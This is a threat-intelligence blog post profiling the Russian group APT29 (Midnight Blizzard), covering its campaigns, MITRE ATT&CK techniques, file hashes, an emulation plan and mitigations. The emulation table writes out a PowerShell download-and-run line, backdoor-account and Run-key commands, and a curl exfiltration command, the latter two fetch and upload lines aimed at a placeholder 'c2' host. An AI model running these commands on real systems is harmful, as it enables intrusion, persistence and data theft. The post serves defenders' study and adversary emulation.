top of page

APT29 (Midnight Blizzard): Operations, IOCs, Tactics, Detection Strategies

  • Mar 7
  • 5 min read

Updated: Mar 28

APT29 (Midnight Blizzard): Operations, IOCs, Tactics, Detection Strategies

 

Introduction

 

APT29, also known as Midnight Blizzard, NOBELIUM, Cozy Bear, The Dukes, Dark Halo, and UNC2452, is a Russian state-sponsored cyber espionage group attributed to the Foreign Intelligence Service of the Russian Federation (SVR). Active since at least 2008, the group has become one of the most searched and referenced nation-state actors in the industry, known for high-impact operations including the 2020 SolarWinds supply chain compromise (affecting 18,000+ organizations), the 2024 breach of Microsoft corporate systems, and large-scale spear-phishing campaigns against government, defense, academia, and NGOs.

 

In this blog, we explore APT29's tactics, techniques, and procedures (TTPs), provide updated indicators of compromise (IOCs), and share an emulation plan to help defenders detect and mitigate this persistent, well-resourced threat.

 

APT29's Modus Operandi

 

APT29 pursues long-term intelligence collection against governments, diplomatic entities, think tanks, IT service providers, and critical infrastructure, with a strong focus on the United States and Europe. The group combines stolen credentials, password spraying, supply chain and trust-chain abuse, and cloud-focused tactics to gain and maintain access. Recent activity emphasizes cloud and hybrid environments, delegated administrative privileges, and signed malicious files (e.g., RDP configuration files) to evade detection and leverage trusted services.

 

Commonly Used Techniques

 

  • Spear-Phishing and Credential Theft: APT29 runs large-scale spear-phishing campaigns using weaponized attachments and links. In October 2024, Microsoft reported campaigns distributing signed Remote Desktop Protocol (RDP) configuration files to thousands of individuals across 100+ organizations in government, academia, defense, and NGOs. Password spraying and use of valid cloud accounts (T1078.004) are common for initial access.

  • Supply Chain and Trust Exploitation: The group has a history of supply chain operations (e.g., SolarWinds) and abusing trust relationships with service providers. Tactics include targeting on-premises environments to pivot into cloud, exploiting delegated admin and federation (e.g., ADFS), and using custom ADFS-focused malware such as FOGGYWEB and MAGICWEB.

  • Cloud and Identity Abuse: SVR actors adapt TTPs for cloud-first access: abuse of cloud tokens, device enrollment, and residential proxy infrastructure (T1090.002) for command-and-control (C2) to blend with normal traffic. Account manipulation (T1098) and creation of accounts (T1136) support persistence.

  • Custom and Commodity Malware: APT29 uses Cobalt Strike Beacon, CozyDuke, and various Duke family implants. Execution often involves PowerShell, WMI, and signed or otherwise trusted file types to reduce suspicion.

  • Defense Evasion: Use of alternate authentication material (T1550), impersonation (T1656), and exfiltration over C2 channels (T1041) are routinely observed. The group invests in operational security and infrastructure that mimics legitimate traffic.

 

Recent Activity (2024–2025)

 

  • January 2024: Midnight Blizzard attacked Microsoft's corporate systems and other U.S. technology companies, accessing corporate email and source code repositories. The incident underscored the actor's ability to compromise highly secured enterprises.

  • February 2024: CISA, NCSC-UK, and international partners released advisory AA24-057A, "SVR Cyber Actors Adapt Tactics for Initial Cloud Access," detailing APT29's evolving tactics for gaining and maintaining access in cloud and hybrid environments.

  • October 2024: Midnight Blizzard conducted a large-scale spear-phishing campaign (starting October 22) using signed RDP configuration files. Emails targeted thousands of users across government, academia, defense, and NGOs, with an assessed goal of intelligence collection.

  • Ongoing: The group remains among the most active APT actors, with continued focus on transportation, shipping, telecommunications, and government sectors. Threat intelligence vendors consistently rank APT29 in the top tier of state-sponsored activity.

 

Key Indicators of Compromise (IOCs)

 

The following IOCs are associated with APT29/Midnight Blizzard campaigns. Infrastructure and hashes rotate; use CISA advisories (e.g., AA24-057A), Microsoft Security Blog, and vendor reports for the latest indicators.

 

Domains and Infrastructure

 

  • APT29 frequently uses residential proxy networks and cloud services for C2 and to obscure origin. Domain patterns often mimic legitimate services or use short-lived registrations.

  • Refer to CISA AA24-057A and Microsoft's Midnight Blizzard guidance for current domain and URL IOCs; the group rotates infrastructure aggressively.

 

Authentication and Cloud

 

  • Monitor for unusual cloud sign-ins (e.g., geographic anomalies, impossible travel), token theft, and abuse of delegated administrative privileges.

  • ADFS and federation abuse: watch for FOGGYWEB/MAGICWEB and unexpected token issuance or consent grants.

 

File and Execution

 

  • Signed RDP (.rdp) configuration files used in spear-phishing (2024 campaign). Inspect RDP files for embedded credentials or pointers to attacker-controlled infrastructure.

  • Cobalt Strike Beacon and Duke-family malware hashes are published in CISA and vendor advisories; maintain an updated feed.

 

File hashes (SHA-1)

 

The following SHA-1 hashes are associated with APT29/Midnight Blizzard campaigns—including malware, signed lures and related artifacts. Use them for file-based hunting, blocklisting in EDR or email security, and correlation in your SIEM or threat-intel platform. Because the group frequently retires and replaces infrastructure, treat these as a snapshot and cross-reference CISA advisories and vendor reports for the latest hashes.

 

SHA-1

395da6d4f3c890295f7584132ea73d759bd9d094

72e5fc82b932c5395d06fd2a655a280cf10ac9aa

75af292f34789a1c782ea36c7127bf6106f595e8

76640508b1e7759e548771a5359eaed353bf1eec

9858d5cb2a6614be3c48e33911bf9f7978b441bf

 

Tactics, Techniques, and Procedures (TTPs)

 

APT29 is tracked as MITRE ATT&CK group G0016. Below is a condensed mapping of techniques commonly associated with Midnight Blizzard:

 

Category

MITRE ATT&CK ID

Description

Initial Access

T1078.004

Valid Accounts: Cloud Accounts

Initial Access

T1566.001

Phishing: Spear-phishing Attachment

Initial Access

T1566.002

Phishing: Spear-phishing Link

Execution

T1059.001

Command and Scripting Interpreter: PowerShell

Execution

T1047

Windows Management Instrumentation

Execution

T1204

User Execution: Malicious Link or File

Persistence

T1098

Account Manipulation

Persistence

T1136

Create Account

Persistence

T1547.001

Boot or Logon Autostart: Registry Run Keys

Credential Access

T1110.003

Brute Force: Password Spraying

Defense Evasion

T1550

Use Alternate Authentication Material

Defense Evasion

T1656

Impersonation

Command and Control

T1090.002

Proxy: External Proxy (e.g., residential)

Exfiltration

T1041

Exfiltration Over C2 Channel

 

Emulation Plan for APT29

 

Environment Setup

 

Component

Details

Active Directory (AD)

2 Windows Servers + 3 Windows Clients

Endpoints

2 Linux, 2 Windows 10/11

SIEM/XDR

ELK Stack / Splunk / Microsoft Sentinel

Network Monitoring

Suricata / Zeek

Cloud

Azure AD / M365 tenant (lab) for cloud TTPs

C2 Framework

Cobalt Strike / Covenant

 

Emulation Actions

 

Tactic

Emulation Actions

Tools/Commands

Reconnaissance

OSINT for target emails and cloud usage; identify high-value roles and delegated admin.

theHarvester, O365/enum tools

Initial Access

Spear-phish with signed RDP file or document; password spray low-complexity accounts.

GoPhish, RDP file lure, SprayingToolkit

Execution

Run PowerShell implants; use WMI for execution.

IEX (New-Object Net.WebClient).DownloadString('http://c2/payload.ps1')

Persistence

Add backdoor accounts; Registry Run keys; cloud app consent.

net user backdoor /add; reg add HKCU...\Run

Credential Access

Dump credentials; abuse cloud tokens; capture NTLM.

Mimikatz, AAD token abuse

C2

Use HTTPS C2 via residential proxy or cloud front.

Cobalt Strike, Malleable C2

Exfiltration

Exfil over C2 or staged to cloud storage.

curl -F "file=@data.zip" https://c2/upload

 

Mitigation Strategies

 

To defend against APT29 and similar SVR-backed threats:

 

  • Identity and Cloud Hardening: Enforce phishing-resistant MFA, conditional access, and least-privilege for cloud and delegated admin. Monitor for impossible travel, token anomalies, and unusual consent or device enrollment.

  • Email and Endpoint Security: Block or alert on malicious RDP files and unusual attachments. Use EDR to detect PowerShell execution, WMI abuse, and Cobalt Strike/Duke-like behaviors.

  • Supply Chain and Trust: Harden ADFS and federation; monitor for FOGGYWEB/MAGICWEB and anomalous token issuance. Assess third-party and service-provider access.

  • Threat Intelligence: Subscribe to CISA advisories (e.g., AA24-057A), Microsoft Security Blog (Midnight Blizzard), and vendor reports. Update IOCs and detection rules regularly; APT29 rotates infrastructure and TTPs.

 

Conclusion

 

APT29 (Midnight Blizzard) remains one of the most capable and widely tracked nation-state threat actors, with sustained operations against government, cloud, and enterprise environments. By understanding their TTPs, applying current IOCs, and emulating their behavior in controlled environments, defenders can improve detection and mitigation of this high-impact adversary.

 

References

 

 

 

Register for instructor-led online courses today! https://www.darkrelay.com/courses

 

Check out our self-paced learning paths!

 

Explore our bundled Pricing & Plans for cost-effective options! Buy a course subscription to learn more, hands-on labs and expert-led training included. https://www.darkrelay.com/plans-pricing

 

Contact us for custom pentesting needs at: info@darkrelay.com or WhatsApp.

 

Comments


bottom of page